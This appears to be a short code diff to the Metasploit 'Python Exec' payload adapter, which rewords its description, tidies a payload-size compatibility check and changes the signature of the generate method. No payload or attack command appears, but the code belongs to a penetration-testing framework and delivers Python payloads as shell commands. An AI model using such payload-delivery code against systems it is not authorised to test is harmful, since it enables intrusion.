@@ -11,7 +11,7 @@ module MetasploitModule
       update_info(
         info,
         'Name' => 'Python Exec',
-        'Description' => 'Execute a Python payload from a command',
+        'Description' => 'Execute a Python payload as an OS command from a Posix-compatible shell',
         'Author' => 'Spencer McIntyre',
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
@@ -23,14 +23,14 @@ module MetasploitModule
   end
 
   def compatible?(mod)
-    if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
+    if mod.type == Msf::MODULE_PAYLOAD && mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
       return false
     end
 
     super
   end
 
-  def generate
+  def generate(_opts = {})
     payload = super
 
     if payload.include?("\n")
